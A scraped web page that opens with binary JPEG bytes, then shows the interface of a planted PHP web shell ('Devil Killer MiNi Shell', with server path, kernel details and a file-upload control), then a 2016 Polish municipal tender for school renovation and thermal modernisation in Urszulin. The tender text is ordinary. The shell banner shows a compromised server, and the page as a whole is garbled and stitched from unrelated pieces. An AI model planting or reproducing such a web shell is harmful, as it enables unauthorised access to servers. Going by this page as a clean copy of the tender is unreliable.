JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/92618-N-2016.html

<p class="kh_header"><b>Urszulin: Roboty remontowe w  Zespole Szkół w Urszulinie, wymiana pokrycia dachowego na budynku Szkoły Podstawowej w Woli Wereszczyńskiej oraz  wykonanie termomodernizacji budynku użyteczności publicznej  w Urszulinie przy ul. Lubelskiej 31 w ramach projektu Termomodernizacja budynków użyteczności publicznej w gminie Urszulin.</b><br>
<b>Numer ogłoszenia: 92618 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urszulin , ul. Kwiatowa 35, 22-234 Urszulin, woj. lubelskie, tel. 082 5713001, faks 082 5713001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurszulin.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w  Zespole Szkół w Urszulinie, wymiana pokrycia dachowego na budynku Szkoły Podstawowej w Woli Wereszczyńskiej oraz  wykonanie termomodernizacji budynku użyteczności publicznej  w Urszulinie przy ul. Lubelskiej 31 w ramach projektu Termomodernizacja budynków użyteczności publicznej w gminie Urszulin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych ( schodów zewnętrznych do budynku Zespołu Szkół w Urszulinie oraz tynków wewnętrznych ), wymiana pokrycia dachowego na budynku Szkoły Podstawowej w Woli Wereszczyńskiej oraz wykonanie termomodernizacji budynku użyteczności publicznej  w Urszulinie,  przy ul. Lubelskiej 31 do 
wykonania w trzech  zadaniach inwestycyjnych.
ZADANIE NR 1
ROBOTY REMONTOWE W ZESPOLE SZKÓŁ W URSZULINIE  
Przedmiotem zamówienia są roboty remontowe w  budynku Zespołu Szkół w Urszulinie przy ulicy Szkolnej 23, w ramach projektu Termomodernizacja budynków użyteczności publicznej w gminie Urszulin.
1.Schody - główne wejście do szkoły (segment łącznik F). Należy rozebrać dotychczasowe okładziny schodów i murków zewnętrznych z lastrico, przedłużyć - domurować murki zewnętrzne do wysokości pierwszego stopnia, górna krawędź murku równoległa do płaszczyzny schodów, wysokość jak istniejący już murek. 
2.Schody boczne do części administracyjnej budynku (segment B). Należy skuć dotychczasowe okładziny schodów z lastrico, schody należy poszerzyć (do wymaganych min. 120 cm szerokości biegu) poprzez domurowanie brakującej części z bloczka betonowego na nowym fundamencie. Wykonać nowe okładziny schodów z kostki brukowej.
3.Remont ścian wewnętrznych korytarza szkolnego (segment G) polegający na wyrównaniu nierówności tynków, wykonaniu tynków na powierzchniach po zamurowanych oknach, oraz malowaniu. 
Wykonawca prowadząc prace musi tak je organizować aby w jak najmniejszym stopniu dezorganizować pracę szkoły (prace będą realizowane w trakcie roku szkolnego) oraz zabezpieczyć roboty tak by nie stwarzały niebezpieczeństwa dla pracowników i dzieci. Ewentualne korzystanie przez Wykonawcę z przyłącza elektrycznego i wody będzie odpłatne a rozliczenie wg. wskazań podliczników Wykonawcy bądź ryczałtowej centy umownej. Wszystkie materiały rozbiórkowe Wykonawca zutylizuje i uprzątnie na własny koszt, a dokumenty potwierdzające przeprowadzenie tych czynności przedstawi Zamawiającemu. 
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.
Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
                                                                ZADANIE NR 2
WYMIANA POKRYCIA  DACHOWEGO  NA BUDYNKU SZKOŁY PODSTAWOWEJ W MIEJSCOWOŚCI WOLA WERESZCZYŃSKA .
Przedmiotem zamówienia jest wymiana pokrycia dachowego na budynku Szkoły Podstawowej w Woli Wereszczyńskiej, działka nr ewid. 164. W ramach zamówienia należy wykonać:
1.Rozbiórkę istniejącego pokrycia dachowego z blachy płaskiej ocynkowanej na rąbek stojący wraz z obróbkami (rynny, rury spustowe, wiatrówki, mury ogniowe, kołnierze, gzymsy, itp.) oraz instalacją odgromową.
2.Rozbiórkę istniejących podbitek z desek drewnianych.
3.Rozebrać ołacenie dachu.
4.Dokonać przeglądu więźby dachowej oraz wymienić uszkodzone i osłabione elementy, wyrównać połacie dachowe.
5.Wykonać izolacje z folii wysokoparoprzepuszczalnej przymocowanej do konstrukcji drewnianej.
6.Wykonać ołacenie połaci dachowych (łaty i kontrłaty).
7.Pokryć dach  blachą ocynkowaną  powlekaną na rąbek stojący o okresie gwarancji min. 30 lat (kolor do ustalenia z inwestorem). 
8.Wykonać i zamontować obróbki blacharskie z blachy ocynkowanej powlekanej (rynny, rury spustowe, wiatrówki, mury ogniowe, kołnierze, gzymsy, itp.) kolor do ustalenia z inwestorem. 
9.Wykonać nową instalacje odgromową oraz dokonać jej sprawdzenia. 
10.Wykonać podbitki z paneli z tworzyw sztucznych na ruszcie drewnianym (kolor do ustalenia z inwestorem).
11.Wykonać przegląd kominów wentylacyjnych; udrożnić ewentualnie niedrożne przewody wentylacyjne, rozebrać elementy skorodowane, uzupełnić  brakujące i rozebrane części, wzmocnić poprzez oklejenie siatką, wyrównać ściany, obrobić blachą trapezową (kolor do uzgodnienia z inwestorem).  Wymienić i uzupełnić brakujące kratki wentylacyjne, obrobić czapki kominowe  blachą ocynkowaną powlekaną (kolor do uzgodnienia z inwestorem).
Prace muszą być prowadzone tak aby nie uszkodzić wykonanego docieplenia i elewacji. Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt. Należy przewidzieć konieczność ewentualnego uzupełnienia docieplenia bądź uszczelnienia piankami powstałych mostków termicznych przy podbitkach.
Wykonawca musi dostosować prace i odpowiednio je zabezpieczyć przed personelem, uczniami szkoły (w przypadku gdy prace będą wykonywane w czasie trwania roku szkolnego) i osobami postronnymi.
Prace muszą być prowadzone tak aby zabezpieczyć  pomieszczenia  budynku szkolnego przed hałasem, uszkodzeniami (zalaniem)  i zanieczyszczeniem.  Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt.
Materiały rozbiórkowe metalowe (blachy z pokrycia dachu,  obróbek blacharskich rynien, rur spustowych itp. Wykonawca złoży w miejscu wskazanym przez inwestora. Pozostałe materiały rozbiórkowe i ewentualnie powstałe w czasie wykonywania prac odpady i śmieci Wykonawca ma obowiązek przeznaczyć do recyklingu bądź  zutylizować na własny koszt, a dokumenty potwierdzające wykonanie tych czynności przedstawić Inwestorowi.
Korzystanie podczas wykonywania prac przez Wykonawcę z energii elektrycznej i wody z przyłącza  Szkoły Podstawowej w Woli Wereszczyńskiej będzie odpłatne. Rozlicznie będzie się odbywało na podstawie odczytu podlicznika który zapewni Wykonawca, bądź ryczałtowo na podstawie ceny umownej. 
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.
Szczegółowy zakres zamówienia zawarty jest  w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
ZADANIE NR 3
TERMOMODERNIZACJA BUDYNKU UŻYTECZNOŚCI PUBLICZNEJ  W URSZULINIE PRZY UL. LUBELSKIEJ 31 
Przedmiotem zamówienia jest wykonanie termomodernizacji budynku użyteczności publicznej przy ul.   Lubelskiej 31 w Urszulinie  w ramach zadania Termomodernizacja budynków użyteczności publicznej w Gminie Urszulin.
W ramach przewidzianych do wykonania robót należy wykonać:
1.Docieplenie ścian budynku styropianem:
- ściany piwniczne na gruncie oraz fundamentowe po uprzednim odkopaniu z wykonaniem izolacji, docieplenie 5 cm styropian XPS 035  z wykonaniem izolacji przeciwwilgociowej i zabezpieczeniem folią,
- ściany zewnętrzne cokołowe docieplenie 5 cm styropian XPS 035. Z wyprawą tynkarską akrylową po uprzednim przygotowaniu płaszczyzn do wykonania prac: skucie tynków i okładzin z płytek, uzupełnienie brakujących tynków, gruntowanie,
- ściana zewnętrzna kondygnacji nad cokołem docieplenie 16 cm styropian EPS 70-040, z wyprawą tynkarską akrylową.
Kolory elewacji (cokołów i ścian) do uzgodnienia z Zamawiającym. Część elewacji ok. 140 m2 wykończenie deską elewacyjną kompozytową na stelażu - kolor do ustalenia z Zamawiającym.
Wykonawca musi przewidzieć konieczność zwiększenia grubości warstwy styropianu w miejscach nierówności ścian, nierówności przejść cokół - ściana tak aby utrzymać płaszczyzny ścian oraz równe odstępy na przejściach cokół - ściana.
Wykonawca musi przewidzieć demontaż i powtórny montaż urządzeń znajdujących się na ścianach zewnętrznych budynków takich jak, wyłączniki, kamery, okablowanie, instalacja odgromowa, tablice pamiątkowe oraz  demontaż i wymianę na energooszczędne (LED) oświetlenia zewnętrznego.
Wykonawca musi przewidzieć wykonanie nowej opaski odwadniającej wokół budynku odbudowę ciągów pieszych  zdemontowanych podczas prac termomodernizacyjnych oraz odtworzenie zieleni - trawników.
2.Naprawa pokrycia dachowego i docieplenie dachu w technologii papy termozgrzewalnej papa modyfikowana  na osnowie poliestrowej.
W skład robót wchodzi:
- demontaż obróbek blacharskich rynien, rur spustowych, gzymsów , kołnierzy, instalacji odgromowej, itp.,
- wykonanie przeglądu kominów wentylacyjnych, udrożnienie i ich naprawa poprzez otynkowanie i wyrównanie ścianek,  naprawa czapek kominowych z obrobieniem ich blachą płaską i zamontowaniem metalowych kratek zabezpieczających,  
- wykonanie pokrycia dachu papą termozgrzewalną,
- wykonanie nowej instalacji odgromowej wraz z jej sprawdzeniem - wykonać pomiary,
- wykonanie i zamontowanie nowych obróbek blacharskich, rynien, rur spustowych, kołnierzy, obróbek murów ogniowych itp.
3.Wymiana okien i drzwi wejściowych 
Zakres prac obejmuje:
- demontaż starych okien i drzwi na poziomie parteru budynku i częściowo na pierwszym piętrze,
- montaż nowych okien z PCV  i drzwi z aluminium wyposażonych w funkcję rozszczelniania o parametrach dla okien U mniejsze i równe 0,9 W/m2K; dla drzwi   U mniejsze i równe 1,3 W/m2K, obrobienie i malowanie glifów od strony wewnętrznej oraz montaż podokienników wewnętrznych i zewnętrznych. Nowe okna i drzwi w barwie grafitowej,
- wykonanie rozkuć i zamurowań tam gdzie zmienią się wymiary otworów okiennych, 
- w części budynku zajmowanej przez Komisariat Policji oraz pomieszczeniu serwerowni GOPS należy zamontować okna i drzwi  antywłamaniowe III klasy z klamkami zabezpieczonymi zamkiem.
4.Wykonanie zadaszenia schodów zewnętrznych.
Częściowe rozebranie konstrukcji istniejących daszków z wymianą podpór z rur na profile stalowe o przekroju kwadratowym, wykonanie nowej konstrukcji nośnej metalowej wypełnionej wodoodporną płytą OSB z obróbką styropianem i wyprawą tynkarską, pokryte blachą trapezową. 
Wykonawca na własny koszt dokona utylizacji i recyklingu wszystkich materiałów rozbiórkowych: okien, drzwi, obróbek blacharskich i innych i przedstawi dokumenty to potwierdzające. Zamawiający pozostawia sobie prawo zagospodarowania niektórych wskazanych demontowanych elementów wyposażenia we własnym zakresie. W tym przypadku elementy te należy złożyć w miejscu wskazanym przez Zamawiającego. 
Ze względu na konieczność prowadzenia prac budowlanych na budynku w którym w trakcie tych prac  będą funkcjonowały urzędy (Policja, GOPS, Gminna Biblioteka Publiczna) prace te powinny być wykonywane tak aby w jak najmniejszym możliwym stopniu zakłócić pracę tych instytucji oraz w sposób bezpieczny dla ich pracowników i interesantów.
Przed złożeniem oferty Wykonawca jest zobowiązany zapoznać się w terenie z rodzajem, rozmiarem prac oraz usytuowaniem budynków objętych przedmiotową inwestycją.
Wykonawca musi wziąć pod uwagę , konieczność ewentualnego  uzgadniania przebiegu i harmonogramu prac z firmą która będzie wykonywała remont i przebudowę kotłowni w tym budynku a która będzie wyłoniona w innym postępowaniu.
Korzystanie przez Wykonawcę z energii elektrycznej i wody będzie odpłatne. Opłata zostanie ustalona na podstawie wskazań podliczników, które zapewni Wykonawcy, bądź ryczałtowo wg ceny umownej.
W ramach prowadzonych prac Wykonawca wykona i zamontuje  w miejscach wskazanych przez Inwestora  budki lęgowe dla ptaków  i schrony dla nietoperzy.
Budki lęgowe dla  wróbli - 3 szt.,  jerzyka 4 szt.,  pójdźki - 1 szt., kawki - 3 szt., półek gniazdowych dla oknówek 2 szt., 12 szt. schronów podtynkowych dla nietoperzy.
Ponadto w miejscach i ilościach wskazanych przez Inwestora, Wykonawca pozostawi otwory wlotowe na strychy dla nietoperzy. W kwestii wyboru odpowiednich budek oraz miejsc ich umieszczenia Wykonawca musi współpracować z ornitologiem kierując się jego wskazaniami.
Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.
Szczegółowy zakres zamówienia zawarty jest  w przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.26.00.00-7, 45.40.00.00-1, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wykonał co najmniej 2 roboty budowlane (wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów, że roboty te zostały wykonane w sposób należyty oraz wskazujących, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone )  w zakresie przebudowy dachów,  o wartości jednostkowej roboty, co najmniej 80.000,00 zł brutto dotyczy zadania nr 2 oraz wykonał co najmniej 2 roboty budowlane (wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów, że roboty te zostały wykonane w sposób należyty oraz wskazujących, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone )  w zakresie termomodernizacji budynków użyteczności publicznej o wartości jednostkowej roboty co najmniej 300.000,00 zł brutto dotyczy zadania nr 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub będzie dysponował w okresie wykonywania zamówienia co najmniej 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, do  kierowania robotami w specjalności  ogólnobudowlanej  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, dotyczy zadania nr  2      i nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
